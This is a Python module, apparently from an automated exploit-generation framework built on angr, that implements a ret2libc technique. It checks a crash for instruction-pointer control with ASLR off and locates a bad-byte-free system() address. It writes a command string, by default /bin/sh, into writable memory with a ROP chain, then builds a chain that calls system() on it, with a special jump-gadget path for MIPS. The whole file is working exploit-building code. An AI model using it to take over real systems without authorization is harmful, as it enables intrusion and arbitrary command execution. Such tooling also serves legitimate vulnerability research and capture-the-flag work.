import os
import logging

import angr
import claripy
from angrop.errors import RopException

from ...vulnerability import Vulnerability
from ..technique import Technique
from .. import Exploit, CannotExploit

# module-level logger shared by every method of this technique
l = logging.getLogger(name="rex.exploit.techniques.ret2libc")

class Ret2Libc(Technique):
    """
    A technique to ROP and invoke system in libc.

    Requirements (enforced by check()): a libc ROP object, an IP overwrite
    (full or partial) and ASLR disabled. apply() either locates the command
    string in the main binary or writes it into a writable libc segment with a
    ROP chain, then builds a second chain that calls ``system(cmd)``.
    """

    name = "ret2libc"
    applicable_to = ['unix']

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # candidate system() addresses, filled by _find_libs_system_addrs();
        # addresses owned by libc are placed in front of the others
        self._system_addrs = []

        # solver for pointer badbyte calculation: _sym_ptr is constrained so that
        # none of its bytes equals a bad byte of the crash input
        self._solver = claripy.Solver()
        self._sym_ptr = claripy.BVS("ptr", self.crash.project.arch.bits)
        for b in self.crash._bad_bytes:
            for i in range(self.crash.project.arch.bytes):
                self._solver.add(self._sym_ptr.get_byte(i) != b)

    def contain_bad_byte(self, ptr):
        """
        Return True if the concrete pointer ``ptr`` contains at least one bad
        byte, i.e. it cannot satisfy the constraints built in __init__.
        """
        return not self._solver.satisfiable(extra_constraints=[self._sym_ptr == ptr])

    def _find_libs_system_addrs(self):
        """
        Collect executable, bad-byte-free addresses of every symbol named
        ``system`` in the loader into ``self._system_addrs``, libc first.
        """
        system_addrs = []
        libc_name = os.path.basename(self.crash.libc_binary)

        # angr does not handle PLT well for some architectures,
        # so we do it by ourselves
        for sym in self.rop.project.loader.symbols:
            if sym.name != "system":
                continue
            addr = sym.rebased_addr
            # make sure it is executable, both system itself and plt are executable
            seg = self.rop.project.loader.find_segment_containing(addr)
            if seg is None or not seg.is_executable:
                continue

            # make sure it does not have bad bytes
            if self.contain_bad_byte(addr):
                continue

            # we still prefer libc system, because this technique is called ret2libc lol
            l.debug("found usable system address @ %#x in segment %s", addr, seg)
            if sym.owner.binary_basename == libc_name:
                system_addrs = [addr] + system_addrs
            else:
                system_addrs.append(addr)

        self._system_addrs = system_addrs

    def check(self):
        """
        Return True if this technique may apply to the crash; otherwise record
        the reason via check_fail_reason() and return False. As a side effect,
        populates ``self._system_addrs``.
        """
        if self.libc_rop is None:
            self.check_fail_reason("No libc ROP available.")
            return False

        # can only exploit ip overwrites
        if not self.crash.one_of([Vulnerability.IP_OVERWRITE, Vulnerability.PARTIAL_IP_OVERWRITE]):
            self.check_fail_reason("Cannot control IP.")
            return False

        # can only work when aslr is off
        if self.crash.aslr:
            self.check_fail_reason("Cannot work when ASLR is on.")
            return False

        # there should be a system function
        self._find_libs_system_addrs()
        if not self._system_addrs:
            self.check_fail_reason("Cannot find system in libc.")
            return False

        return True

    def _find_writable_region(self, data):
        """
        Return an address ``addr`` such that ``[addr, addr + len(data))`` lies
        inside a writable segment of the libc ROP object's main binary and the
        pointer ``addr`` itself contains no bad bytes.

        Only the start pointer is checked for bad bytes.

        :raises RopException: if no writable segment can host ``data``
        """
        size = max(len(data), 1)
        for seg in self.libc_rop.project.loader.main_object.segments:
            if not seg.is_writable:
                continue
            # seg.max_addr is the last byte of the segment (inclusive), so the
            # last start address that still fits `size` bytes is max_addr - size + 1
            last_start = seg.max_addr - size + 1
            if last_start < seg.min_addr:
                # segment too small; also avoids a negative bound in the BV comparison
                continue
            consts = [self._sym_ptr >= seg.min_addr, self._sym_ptr <= last_start]
            if self._solver.satisfiable(extra_constraints=consts):
                return self._solver.eval(self._sym_ptr, 1, extra_constraints=consts)[0]
        raise RopException("Cannot find writable region inside libc")

    def _insert_chain(self, chain):
        """
        Place ``chain`` at the IP-overwrite site of the crash state and add the
        constraint that memory there holds the chain's payload.

        :return: the address the chain was placed at
        :raises CannotExploit: if the chain cannot be inserted
        """
        try:
            chain, chain_addr = self._ip_overwrite_with_chain(chain, state=self.crash.state, rop=self.libc_rop)
        except CannotExploit as e:
            raise CannotExploit("[%s] unable to insert chain" % self.name) from e

        payload = chain.payload_str(timeout=len(chain._values)*2)
        # load exactly len(payload) bytes so both sides of == have the same width
        chain_mem = self.crash.state.memory.load(chain_addr, len(payload))
        self.crash.state.add_constraints(chain_mem == claripy.BVV(payload))
        return chain_addr

    def _write_cmd_str(self, cmd_str):
        """
        Write ``cmd_str`` into a writable libc region using a ROP chain (the
        only write primitive used here), then step the state past the chain.

        :return: ``(addr, True)``. ``addr`` is where the string is written. The
            chain constraints are already added to the state, so the second
            element is a trivial constraint, kept for backward compatibility.
        """
        # look for writable address
        l.debug("Looking for writable region...")
        addr = self._find_writable_region(cmd_str)
        l.debug("Found writable address @ %#x", addr)

        # write rop chain to the address
        l.debug("Trying to use ROP chain to write %s into %#x...", cmd_str, addr)
        chain = self.libc_rop.write_to_mem(addr, cmd_str, fill_byte=self._get_fill_byte())

        # add constraints
        l.debug("Applying all the constraints, fingers crossed...")
        self._insert_chain(chain)

        # windup
        self._windup_to_unconstrained_successor()

        return addr, True

    def _find_mips_jop_pair(self):
        """
        Select the MIPS gadgets used to reach system():
          - a jump gadget whose jump_reg is t9 and whose pc_reg is a different register;
          - a gadget that pops that pc_reg.
        Gadgets that change a0 or read/write memory are rejected.

        :return: ``(set_reg_gadget, jop_gadget)``
        :raises RopException: if no suitable pair exists
        """
        # list all potential JOP gadgets
        jop_candidates = [g for g in self.libc_rop.rop_gadgets if g.gadget_type == "jump"
                          and g.jump_reg == 't9' and g.pc_reg != 't9']

        # filter out gadgets that touch a0 (set to the command pointer beforehand);
        # we need to filter out reads and writes to avoid SIGSEGV from them with invalid addresses
        jop_candidates = [g for g in jop_candidates
                          if 'a0' not in g.changed_regs and not g.mem_reads and not g.mem_writes]

        # look for a good chain
        for jop_gadget in jop_candidates:
            pc_reg = jop_gadget.pc_reg
            setters = [g for g in self.libc_rop.rop_gadgets
                       if pc_reg in g.popped_regs
                       and 'a0' not in g.changed_regs and not g.mem_reads and not g.mem_writes]
            if setters:
                # get the smallest one
                return min(setters, key=lambda g: g.stack_change), jop_gadget
        raise RopException("Fail to build JOP chain")

    def _invoke_system(self, system_addr, cmd_addr):
        """
        Generate a rop chain to invoke system(cmd_addr) and constrain the
        crash state accordingly.
        """
        if not self.crash.project.arch.name.startswith("MIPS"):
            chain = self.libc_rop.func_call(system_addr, [cmd_addr])
            # insert the chain into the binary and require it to exist at that address
            self._insert_chain(chain)
            return

        # mips does some weird shit, we need to handle it separately:
        # set a0 with a ROP chain, then go through a pc_reg-setting gadget and a
        # jump gadget whose jump_reg is t9, with t9 constrained to system_addr
        chain = self.libc_rop.set_regs(a0=cmd_addr)
        self._insert_chain(chain)
        self._windup_to_unconstrained_successor()

        set_reg_gadget, jop_gadget = self._find_mips_jop_pair()
        self.crash.state.solver.add(self.crash.state.ip == set_reg_gadget.addr)
        self._windup_to_unconstrained_successor()

        self.crash.state.solver.add(self.crash.state.ip == jop_gadget.addr)
        self._windup_to_unconstrained_successor()

        self.crash.state.solver.add(self.crash.state.regs.t9 == system_addr)

    def apply(self, cmd=b'/bin/sh', **kwargs):# pylint:disable=arguments-differ
        """
        Build an exploit that calls ``system(cmd)``.

        :param cmd: the command as bytes, without a trailing null byte
        :return: an Exploit with ``bypasses_nx=True`` and ``bypasses_aslr=False``
        :raises CannotExploit: if no system address is known (e.g. check() was
            not run or failed), the command cannot be placed in memory, a
            chain cannot be built, or the final state is unsatisfiable
        """
        if not self._system_addrs:
            raise CannotExploit("[%s] no usable system address, was check() called?" % self.name)
        system_addr = self._system_addrs[0]

        # look for the null-terminated command (usually "/bin/sh\x00") in the main
        # binary; take the first occurrence whose address has no bad bytes.
        # If none exists, it will be written to memory below.
        needle = cmd + b'\x00'
        main_obj = self.crash.project.loader.main_object
        cmd_addr = None
        for offset in main_obj.memory.find(needle):
            candidate = offset + main_obj.mapped_base
            if not self.contain_bad_byte(candidate):
                cmd_addr = candidate
                l.debug("Found command %s in the memory at %#x!", needle, cmd_addr)
                break

        # if writing the cmd to memory is necessary, don't use null byte
        # or it will cause some troubles in ropchain generation
        # also, avoid blank space
        cmd_str = self._encode_cmd(cmd)

        try:
            if cmd_addr is None:
                # write out cmd_str
                l.debug("Try to write command %s into the memory", cmd_str)
                cmd_addr, cmd_constraint = self._write_cmd_str(cmd_str)
                if cmd_addr is None:
                    raise CannotExploit("[%s] cannot write command to memory" % self.name)

                # _write_cmd_str already constrains the state to hold the write chain;
                # only add the returned constraint if it is non-trivial
                if cmd_constraint is not True:
                    self.crash.state.add_constraints(cmd_constraint)

            # craft chain to call system
            l.debug("Try to invoke system(%s)", cmd_str)
            self._invoke_system(system_addr, cmd_addr)
        except (RopException, angr.errors.SimUnsatError) as e:
            raise CannotExploit("[%s] cannot craft caller chain" % self.name) from e

        if not self.crash.state.satisfiable():
            raise CannotExploit("[%s] generated exploit is not satisfiable" % self.name)

        return Exploit(self.crash, bypasses_nx=True, bypasses_aslr=False)
